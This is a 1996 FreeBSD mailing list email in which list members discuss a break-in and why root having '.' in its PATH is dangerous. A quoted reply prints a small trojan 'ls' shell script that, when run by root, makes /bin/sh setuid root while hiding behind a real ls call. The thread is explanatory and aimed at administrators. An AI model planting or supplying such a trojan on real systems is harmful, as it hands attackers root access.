From owner-freebsd-hackers Tue Jun 25 00:34:25 1996 Return-Path: owner-hackers Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA27208 for hackers-outgoing; Tue, 25 Jun 1996 00:34:25 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA27200; Tue, 25 Jun 1996 00:34:23 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id AAA07004; Tue, 25 Jun 1996 00:34:00 -0700 (PDT) Date: Tue, 25 Jun 1996 00:33:59 -0700 (PDT) From: -Vince- To: "Michael L. VanLoon -- HeadCandy.com" cc: Mark Murray , hackers@freebsd.org, security@freebsd.org, Chad Shackley , jbhunt Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <199606250727.AAA24988@MindBender.HeadCandy.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-hackers@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Tue, 25 Jun 1996, Michael L. VanLoon -- HeadCandy.com wrote: > > >> 2) The Cracker made a trojan script somewhere (usually exploiting > >> some admins (roots) who have "." in their path). This way he creates > >> a script that when run as root will make him a suid program. > >> after this he has you by tender bits. > > > Hmmm, doesn't everyone have . as their path since all . does is allow > >someone to run stuff from the current directory... > > Assume root has "." in its path. Hacker puts this little script in > his dir, maybe also in /tmp/; it's called "ls" (imagine the > coincidence), and it's executable by all: > > #!/bin/sh > chown root /bin/sh > /dev/null 2>&1 > chmod u+s,a+x /bin/sh > /dev/null 2>&1 > ls $\* > > Then sits back and waits for the sysadmin to come along and type "ls" > in one of those directories. > > Pop quiz: what is the result? Never thought about that one.... Vince